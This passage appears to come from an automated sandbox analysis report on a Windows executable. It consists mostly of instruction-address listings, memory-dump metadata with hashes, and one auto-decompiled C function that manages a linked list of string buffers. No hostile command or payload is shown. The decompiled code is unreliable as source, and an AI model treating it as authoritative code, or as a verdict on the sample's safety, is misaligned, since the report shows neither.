                                                                                                                    0x004060fb
                                                                                                                    0x00406109
                                                                                                                    0x00406109
                                                                                                                    0x0040610d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060fd
                                                                                                                    0x00406100
                                                                                                                    0x00406101
                                                                                                                    0x00406101
                                                                                                                    0x00000000
                                                                                                                    0x004060fd
                                                                                                                    0x004060d7
                                                                                                                    0x004060dc
                                                                                                                    0x004060dc
                                                                                                                    0x004060e5
                                                                                                                    0x004060ed
                                                                                                                    0x004060f0
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x004060f6
                                                                                                                    0x00000000
                                                                                                                    0x00406113
                                                                                                                    0x00406113
                                                                                                                    0x00406117
                                                                                                                    0x004069c3
                                                                                                                    0x00000000
                                                                                                                    0x004069c3
                                                                                                                    0x00406120
                                                                                                                    0x00406130
                                                                                                                    0x00406133
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406136
                                                                                                                    0x00406139
                                                                                                                    0x0040613d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040613f
                                                                                                                    0x00406145
                                                                                                                    0x0040616f
                                                                                                                    0x00406175
                                                                                                                    0x0040617c
                                                                                                                    0x00000000
                                                                                                                    0x0040617c
                                                                                                                    0x0040614b
                                                                                                                    0x0040614e
                                                                                                                    0x00406153
                                                                                                                    0x00406153
                                                                                                                    0x0040615e
                                                                                                                    0x00406166
                                                                                                                    0x00406169
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061ae
                                                                                                                    0x004061b4
                                                                                                                    0x004061b7
                                                                                                                    0x004061c4
                                                                                                                    0x004061cc
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406183
                                                                                                                    0x00406183
                                                                                                                    0x00406187
                                                                                                                    0x004069d2
                                                                                                                    0x00000000
                                                                                                                    0x004069d2
                                                                                                                    0x00406193
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x0040619e
                                                                                                                    0x004061a1
                                                                                                                    0x004061a4
                                                                                                                    0x004061a7
                                                                                                                    0x004061ac
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406843
                                                                                                                    0x00406843
                                                                                                                    0x00406849
                                                                                                                    0x0040684f
                                                                                                                    0x00406855
                                                                                                                    0x0040686f
                                                                                                                    0x00406872
                                                                                                                    0x00406878
                                                                                                                    0x00406883
                                                                                                                    0x00406885
                                                                                                                    0x00406857
                                                                                                                    0x00406857
                                                                                                                    0x00406866
                                                                                                                    0x0040686a
                                                                                                                    0x0040686a
                                                                                                                    0x0040688f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004061d4
                                                                                                                    0x004061d6
                                                                                                                    0x004061d9
                                                                                                                    0x0040624a
                                                                                                                    0x0040624d
                                                                                                                    0x00406250
                                                                                                                    0x00406257
                                                                                                                    0x00406261
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x004061db
                                                                                                                    0x004061df
                                                                                                                    0x004061e2
                                                                                                                    0x004061e4
                                                                                                                    0x004061e7
                                                                                                                    0x004061ea
                                                                                                                    0x004061ec
                                                                                                                    0x004061ef
                                                                                                                    0x004061f1
                                                                                                                    0x004061f6
                                                                                                                    0x004061f9
                                                                                                                    0x004061fc
                                                                                                                    0x00406200
                                                                                                                    0x00406207
                                                                                                                    0x0040620a
                                                                                                                    0x00406211
                                                                                                                    0x00406215
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x0040621d
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x00406217
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x0040620c
                                                                                                                    0x00406221
                                                                                                                    0x00406224
                                                                                                                    0x00406242
                                                                                                                    0x00406244
                                                                                                                    0x00000000
                                                                                                                    0x00406226
                                                                                                                    0x00406226
                                                                                                                    0x00406229
                                                                                                                    0x0040622c
                                                                                                                    0x0040622f
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406231
                                                                                                                    0x00406234
                                                                                                                    0x00406237
                                                                                                                    0x00406239
                                                                                                                    0x0040623a
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x0040623d
                                                                                                                    0x00000000
                                                                                                                    0x00406473
                                                                                                                    0x00406477
                                                                                                                    0x00406495
                                                                                                                    0x00406498
                                                                                                                    0x0040649f
                                                                                                                    0x004064a2
                                                                                                                    0x004064a5
                                                                                                                    0x004064a8
                                                                                                                    0x004064ab
                                                                                                                    0x004064ae
                                                                                                                    0x004064b0
                                                                                                                    0x004064b7
                                                                                                                    0x004064b8
                                                                                                                    0x004064ba
                                                                                                                    0x004064bd
                                                                                                                    0x004064c0
                                                                                                                    0x004064c3
                                                                                                                    0x004064c3
                                                                                                                    0x004064c8
                                                                                                                    0x00000000
                                                                                                                    0x004064c8
                                                                                                                    0x00406479
                                                                                                                    0x0040647c
                                                                                                                    0x0040647f
                                                                                                                    0x00406489
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406520
                                                                                                                    0x00406524
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040652a
                                                                                                                    0x0040652e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406534
                                                                                                                    0x00406536
                                                                                                                    0x0040653a
                                                                                                                    0x0040653a
                                                                                                                    0x0040653d
                                                                                                                    0x00406541
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406591
                                                                                                                    0x00406595
                                                                                                                    0x0040659c
                                                                                                                    0x0040659f
                                                                                                                    0x004065a2
                                                                                                                    0x004065ac
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406597
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065b8
                                                                                                                    0x004065bc
                                                                                                                    0x004065c3
                                                                                                                    0x004065c6
                                                                                                                    0x004065c9
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065be
                                                                                                                    0x004065cc
                                                                                                                    0x004065cf
                                                                                                                    0x004065d2
                                                                                                                    0x004065d2
                                                                                                                    0x004065d5
                                                                                                                    0x004065d8
                                                                                                                    0x004065db
                                                                                                                    0x004065db
                                                                                                                    0x004065de
                                                                                                                    0x004065e5
                                                                                                                    0x004065ea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406678
                                                                                                                    0x00406678
                                                                                                                    0x0040667c
                                                                                                                    0x00406a1a
                                                                                                                    0x00000000
                                                                                                                    0x00406a1a
                                                                                                                    0x00406682
                                                                                                                    0x00406685
                                                                                                                    0x00406688
                                                                                                                    0x0040668c
                                                                                                                    0x0040668f
                                                                                                                    0x00406695
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x00406697
                                                                                                                    0x0040669a
                                                                                                                    0x0040669d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040626d
                                                                                                                    0x0040626d
                                                                                                                    0x00406271
                                                                                                                    0x004069de
                                                                                                                    0x00000000
                                                                                                                    0x004069de
                                                                                                                    0x00406277
                                                                                                                    0x0040627a
                                                                                                                    0x0040627d
                                                                                                                    0x00406281
                                                                                                                    0x00406284
                                                                                                                    0x0040628a
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628c
                                                                                                                    0x0040628f
                                                                                                                    0x00406292
                                                                                                                    0x00406292
                                                                                                                    0x00406295
                                                                                                                    0x00406298
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040629e
                                                                                                                    0x004062a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004062aa
                                                                                                                    0x004062aa
                                                                                                                    0x004062ae
                                                                                                                    0x004062b1
                                                                                                                    0x004062b4
                                                                                                                    0x004062b7
                                                                                                                    0x004062ba
                                                                                                                    0x004062bb
                                                                                                                    0x004062be
                                                                                                                    0x004062c0
                                                                                                                    0x004062c6
                                                                                                                    0x004062c9
                                                                                                                    0x004062cc
                                                                                                                    0x004062cf
                                                                                                                    0x004062d2
                                                                                                                    0x004062d5
                                                                                                                    0x004062d8
                                                                                                                    0x004062f4
                                                                                                                    0x004062f7
                                                                                                                    0x004062fa
                                                                                                                    0x004062fd
                                                                                                                    0x00406304
                                                                                                                    0x00406308
                                                                                                                    0x0040630a
                                                                                                                    0x0040630e
                                                                                                                    0x004062da
                                                                                                                    0x004062da
                                                                                                                    0x004062de
                                                                                                                    0x004062e6
                                                                                                                    0x004062eb
                                                                                                                    0x004062ed
                                                                                                                    0x004062ef
                                                                                                                    0x004062ef
                                                                                                                    0x00406311
                                                                                                                    0x00406318
                                                                                                                    0x0040631b
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406321
                                                                                                                    0x00000000
                                                                                                                    0x00406326
                                                                                                                    0x00406326
                                                                                                                    0x0040632a
                                                                                                                    0x004069ea
                                                                                                                    0x00000000
                                                                                                                    0x004069ea
                                                                                                                    0x00406330
                                                                                                                    0x00406333
                                                                                                                    0x00406336
                                                                                                                    0x0040633a
                                                                                                                    0x0040633d
                                                                                                                    0x00406343
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406345
                                                                                                                    0x00406348
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x0040634b
                                                                                                                    0x00406351
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406353
                                                                                                                    0x00406356
                                                                                                                    0x00406359
                                                                                                                    0x0040635c
                                                                                                                    0x0040635f
                                                                                                                    0x00406362
                                                                                                                    0x00406365
                                                                                                                    0x00406368
                                                                                                                    0x0040636b
                                                                                                                    0x0040636e
                                                                                                                    0x00406371
                                                                                                                    0x00406389
                                                                                                                    0x0040638c
                                                                                                                    0x0040638f
                                                                                                                    0x00406392
                                                                                                                    0x00406392
                                                                                                                    0x00406395
                                                                                                                    0x00406399
                                                                                                                    0x0040639b
                                                                                                                    0x00406373
                                                                                                                    0x00406373
                                                                                                                    0x0040637b
                                                                                                                    0x00406380
                                                                                                                    0x00406382
                                                                                                                    0x00406384
                                                                                                                    0x00406384
                                                                                                                    0x0040639e
                                                                                                                    0x004063a5
                                                                                                                    0x004063a8
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x00000000
                                                                                                                    0x004063aa
                                                                                                                    0x004063a8
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x004063af
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063ea
                                                                                                                    0x004063ea
                                                                                                                    0x004063ee
                                                                                                                    0x004069f6
                                                                                                                    0x00000000
                                                                                                                    0x004069f6
                                                                                                                    0x004063f4
                                                                                                                    0x004063f7
                                                                                                                    0x004063fa
                                                                                                                    0x004063fe
                                                                                                                    0x00406401
                                                                                                                    0x00406407
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x00406409
                                                                                                                    0x0040640c
                                                                                                                    0x0040640f
                                                                                                                    0x0040640f
                                                                                                                    0x00406415
                                                                                                                    0x004063b3
                                                                                                                    0x004063b3
                                                                                                                    0x004063b6
                                                                                                                    0x00000000
                                                                                                                    0x004063b6
                                                                                                                    0x00406417
                                                                                                                    0x00406417
                                                                                                                    0x0040641a
                                                                                                                    0x0040641d
                                                                                                                    0x00406420
                                                                                                                    0x00406423
                                                                                                                    0x00406426
                                                                                                                    0x00406429
                                                                                                                    0x0040642c
                                                                                                                    0x0040642f
                                                                                                                    0x00406432
                                                                                                                    0x00406435
                                                                                                                    0x0040644d
                                                                                                                    0x00406450
                                                                                                                    0x00406453
                                                                                                                    0x00406456
                                                                                                                    0x00406456
                                                                                                                    0x00406459
                                                                                                                    0x0040645d
                                                                                                                    0x0040645f
                                                                                                                    0x00406437
                                                                                                                    0x00406437
                                                                                                                    0x0040643f
                                                                                                                    0x00406444
                                                                                                                    0x00406446
                                                                                                                    0x00406448
                                                                                                                    0x00406448
                                                                                                                    0x00406462
                                                                                                                    0x00406469
                                                                                                                    0x0040646c
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x0040646e
                                                                                                                    0x00000000
                                                                                                                    0x004066fb
                                                                                                                    0x004066fb
                                                                                                                    0x004066ff
                                                                                                                    0x00406a26
                                                                                                                    0x00000000
                                                                                                                    0x00406a26
                                                                                                                    0x00406705
                                                                                                                    0x00406708
                                                                                                                    0x0040670b
                                                                                                                    0x0040670f
                                                                                                                    0x00406712
                                                                                                                    0x00406718
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671a
                                                                                                                    0x0040671d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004064cb
                                                                                                                    0x004064cb
                                                                                                                    0x004064ce
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x0040680a
                                                                                                                    0x0040680e
                                                                                                                    0x00406830
                                                                                                                    0x00406833
                                                                                                                    0x0040683d
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00000000
                                                                                                                    0x00406840
                                                                                                                    0x00406840
                                                                                                                    0x00406810
                                                                                                                    0x00406813
                                                                                                                    0x00406817
                                                                                                                    0x0040681a
                                                                                                                    0x0040681a
                                                                                                                    0x0040681d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004068c7
                                                                                                                    0x004068cb
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068e9
                                                                                                                    0x004068f0
                                                                                                                    0x004068f7
                                                                                                                    0x004068fe
                                                                                                                    0x004068fe
                                                                                                                    0x00000000
                                                                                                                    0x004068fe
                                                                                                                    0x004068cd
                                                                                                                    0x004068d0
                                                                                                                    0x004068d3
                                                                                                                    0x004068d6
                                                                                                                    0x004068dd
                                                                                                                    0x00406821
                                                                                                                    0x00406821
                                                                                                                    0x00406824
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004069b8
                                                                                                                    0x004069bb
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004065f2
                                                                                                                    0x004065f4
                                                                                                                    0x004065fb
                                                                                                                    0x004065fc
                                                                                                                    0x004065fe
                                                                                                                    0x00406601
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406609
                                                                                                                    0x0040660c
                                                                                                                    0x0040660f
                                                                                                                    0x00406611
                                                                                                                    0x00406613
                                                                                                                    0x00406613
                                                                                                                    0x00406614
                                                                                                                    0x00406617
                                                                                                                    0x0040661e
                                                                                                                    0x00406621
                                                                                                                    0x0040662f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406905
                                                                                                                    0x00406905
                                                                                                                    0x00406908
                                                                                                                    0x0040690f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406914
                                                                                                                    0x00406914
                                                                                                                    0x00406918
                                                                                                                    0x00406a50
                                                                                                                    0x00000000
                                                                                                                    0x00406a50
                                                                                                                    0x0040691e
                                                                                                                    0x00406921
                                                                                                                    0x00406924
                                                                                                                    0x00406928
                                                                                                                    0x0040692b
                                                                                                                    0x00406931
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406933
                                                                                                                    0x00406936
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x00406939
                                                                                                                    0x0040693c
                                                                                                                    0x0040693c
                                                                                                                    0x00406940
                                                                                                                    0x004069a0
                                                                                                                    0x004069a3
                                                                                                                    0x004069a8
                                                                                                                    0x004069a9
                                                                                                                    0x004069ab
                                                                                                                    0x004069ad
                                                                                                                    0x004069b0
                                                                                                                    0x004068bc
                                                                                                                    0x004068bc
                                                                                                                    0x00000000
                                                                                                                    0x004068c2
                                                                                                                    0x004068bc
                                                                                                                    0x00406942
                                                                                                                    0x00406948
                                                                                                                    0x0040694b
                                                                                                                    0x0040694e
                                                                                                                    0x00406951
                                                                                                                    0x00406954
                                                                                                                    0x00406957
                                                                                                                    0x0040695a
                                                                                                                    0x0040695d
                                                                                                                    0x00406960
                                                                                                                    0x00406963
                                                                                                                    0x0040697c
                                                                                                                    0x0040697f
                                                                                                                    0x00406982
                                                                                                                    0x00406985
                                                                                                                    0x00406989
                                                                                                                    0x0040698b
                                                                                                                    0x0040698b
                                                                                                                    0x0040698c
                                                                                                                    0x0040698f
                                                                                                                    0x00406965
                                                                                                                    0x00406965
                                                                                                                    0x0040696d
                                                                                                                    0x00406972
                                                                                                                    0x00406974
                                                                                                                    0x00406977
                                                                                                                    0x00406977
                                                                                                                    0x00406992
                                                                                                                    0x00406999
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x0040699b
                                                                                                                    0x00000000
                                                                                                                    0x00406637
                                                                                                                    0x0040663a
                                                                                                                    0x00406670
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a0
                                                                                                                    0x004067a3
                                                                                                                    0x004067a3
                                                                                                                    0x004067a6
                                                                                                                    0x004067a8
                                                                                                                    0x00406a32
                                                                                                                    0x00000000
                                                                                                                    0x00406a32
                                                                                                                    0x004067ae
                                                                                                                    0x004067b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067b7
                                                                                                                    0x004067bb
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x004067be
                                                                                                                    0x00000000
                                                                                                                    0x004067be
                                                                                                                    0x0040663c
                                                                                                                    0x0040663e
                                                                                                                    0x00406640
                                                                                                                    0x00406642
                                                                                                                    0x00406645
                                                                                                                    0x00406646
                                                                                                                    0x00406648
                                                                                                                    0x0040664a
                                                                                                                    0x0040664d
                                                                                                                    0x00406650
                                                                                                                    0x00406666
                                                                                                                    0x0040666b
                                                                                                                    0x004066a3
                                                                                                                    0x004066a3
                                                                                                                    0x004066a7
                                                                                                                    0x004066d3
                                                                                                                    0x004066d5
                                                                                                                    0x004066dc
                                                                                                                    0x004066df
                                                                                                                    0x004066e2
                                                                                                                    0x004066e2
                                                                                                                    0x004066e7
                                                                                                                    0x004066e7
                                                                                                                    0x004066e9
                                                                                                                    0x004066ec
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x00406723
                                                                                                                    0x00406723
                                                                                                                    0x00406726
                                                                                                                    0x00406729
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x0040679d
                                                                                                                    0x00000000
                                                                                                                    0x0040679d
                                                                                                                    0x0040672b
                                                                                                                    0x00406731
                                                                                                                    0x00406734
                                                                                                                    0x00406737
                                                                                                                    0x0040673a
                                                                                                                    0x0040673d
                                                                                                                    0x00406740
                                                                                                                    0x00406743
                                                                                                                    0x00406746
                                                                                                                    0x00406749
                                                                                                                    0x0040674c
                                                                                                                    0x00406765
                                                                                                                    0x00406767
                                                                                                                    0x0040676a
                                                                                                                    0x0040676b
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406773
                                                                                                                    0x00406775
                                                                                                                    0x00406777
                                                                                                                    0x0040677a
                                                                                                                    0x0040677c
                                                                                                                    0x0040677f
                                                                                                                    0x00406783
                                                                                                                    0x00406785
                                                                                                                    0x00406785
                                                                                                                    0x00406786
                                                                                                                    0x00406789
                                                                                                                    0x0040678c
                                                                                                                    0x0040674e
                                                                                                                    0x0040674e
                                                                                                                    0x00406756
                                                                                                                    0x0040675b
                                                                                                                    0x0040675d
                                                                                                                    0x00406760
                                                                                                                    0x00406760
                                                                                                                    0x0040678f
                                                                                                                    0x00406796
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00406720
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00000000
                                                                                                                    0x00406798
                                                                                                                    0x00406796
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066ae
                                                                                                                    0x004066b1
                                                                                                                    0x004066b4
                                                                                                                    0x004066b7
                                                                                                                    0x004066b9
                                                                                                                    0x004066bc
                                                                                                                    0x004066bf
                                                                                                                    0x004066bf
                                                                                                                    0x004066c2
                                                                                                                    0x004066c2
                                                                                                                    0x004066c5
                                                                                                                    0x004066cc
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x004066a0
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x00000000
                                                                                                                    0x004066ce
                                                                                                                    0x004066cc
                                                                                                                    0x00406652
                                                                                                                    0x00406655
                                                                                                                    0x00406657
                                                                                                                    0x0040665a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004063b9
                                                                                                                    0x004063b9
                                                                                                                    0x004063bd
                                                                                                                    0x00406a02
                                                                                                                    0x00000000
                                                                                                                    0x00406a02
                                                                                                                    0x004063c3
                                                                                                                    0x004063c6
                                                                                                                    0x004063c9
                                                                                                                    0x004063cc
                                                                                                                    0x004063cf
                                                                                                                    0x004063d2
                                                                                                                    0x004063d5
                                                                                                                    0x004063d7
                                                                                                                    0x004063da
                                                                                                                    0x004063dd
                                                                                                                    0x004063e0
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x004063e2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406544
                                                                                                                    0x00406544
                                                                                                                    0x00406548
                                                                                                                    0x00406a0e
                                                                                                                    0x00000000
                                                                                                                    0x00406a0e
                                                                                                                    0x0040654e
                                                                                                                    0x00406551
                                                                                                                    0x00406554
                                                                                                                    0x00406557
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x00406559
                                                                                                                    0x0040655c
                                                                                                                    0x0040655f
                                                                                                                    0x00406562
                                                                                                                    0x00406565
                                                                                                                    0x00406568
                                                                                                                    0x0040656b
                                                                                                                    0x0040656c
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x0040656e
                                                                                                                    0x00406571
                                                                                                                    0x00406574
                                                                                                                    0x00406577
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657a
                                                                                                                    0x0040657d
                                                                                                                    0x0040657f
                                                                                                                    0x0040657f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c1
                                                                                                                    0x004067c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004067cb
                                                                                                                    0x004067ce
                                                                                                                    0x004067d1
                                                                                                                    0x004067d4
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d6
                                                                                                                    0x004067d9
                                                                                                                    0x004067dc
                                                                                                                    0x004067df
                                                                                                                    0x004067e2
                                                                                                                    0x004067e5
                                                                                                                    0x004067e8
                                                                                                                    0x004067e9
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067eb
                                                                                                                    0x004067ee
                                                                                                                    0x004067f1
                                                                                                                    0x004067f4
                                                                                                                    0x004067f7
                                                                                                                    0x004067fa
                                                                                                                    0x004067fe
                                                                                                                    0x00406800
                                                                                                                    0x00406803
                                                                                                                    0x00000000
                                                                                                                    0x00406805
                                                                                                                    0x00406582
                                                                                                                    0x00406582
                                                                                                                    0x00000000
                                                                                                                    0x00406582
                                                                                                                    0x00406803
                                                                                                                    0x00406a38
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00406067
                                                                                                                    0x00406a6f
                                                                                                                    0x00406a6f
                                                                                                                    0x00000000
                                                                                                                    0x00406a6f
                                                                                                                    0x004068bc
                                                                                                                    0x00406843
                                                                                                                    0x00406840

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                                                                    • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                                                                                                    • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                                                                    • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401B23, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 59%
                                                                                                                    			E00401B23(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40b010; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E00405BBA(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x28)));
						_t11 =  *0x40b010; // 0x0
						 *_t34 = _t11;
						 *0x40b010 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E00405B98(_t33, _t2);
							_push(_t30);
							 *0x40b010 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								E00405B98(0x409c10, _t30 + 4);
								_t21 =  *0x40b010; // 0x0
								E00405B98(_t32, _t21 + 4);
								_t24 =  *0x40b010; // 0x0
								_push(0x409c10);
								_push(_t24 + 4);
								E00405B98();
								L15:
								 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00405BBA(_t27, _t30, _t33, _t27, 0xffffffe8));
					E00405459();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}













                                                                                                                    0x00401b23
                                                                                                                    0x00401b23
                                                                                                                    0x00401b26
                                                                                                                    0x00401b2e
                                                                                                                    0x00401b76
                                                                                                                    0x00401ba4
                                                                                                                    0x00401bad
                                                                                                                    0x00401baf
                                                                                                                    0x00401bb3
                                                                                                                    0x00401bb8
                                                                                                                    0x00401bbd
                                                                                                                    0x00401bbf
                                                                                                                    0x00401b78
                                                                                                                    0x00401b7a
                                                                                                                    0x0040268f
                                                                                                                    0x00401b80
                                                                                                                    0x00401b80
                                                                                                                    0x00401b85
                                                                                                                    0x00401b8c
                                                                                                                    0x00401b8d
                                                                                                                    0x00401b92
                                                                                                                    0x00401b92
                                                                                                                    0x00401b7a
                                                                                                                    0x00000000
                                                                                                                    0x00401b30
                                                                                                                    0x00401b30
                                                                                                                    0x00401b30
                                                                                                                    0x00401b33
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00401b39
                                                                                                                    0x00401b3d
                                                                                                                    0x00000000
                                                                                                                    0x00401b3f
                                                                                                                    0x00401b41
                                                                                                                    0x00000000
                                                                                                                    0x00401b47
                                                                                                                    0x00401b47
                                                                                                                    0x00401b51
                                                                                                                    0x00401b56
                                                                                                                    0x00401b60
                                                                                                                    0x00401b65
                                                                                                                    0x00401b6a
                                                                                                                    0x00401b6e
                                                                                                                    0x004027e4
                                                                                                                    0x004028be
                                                                                                                    0x004028c1
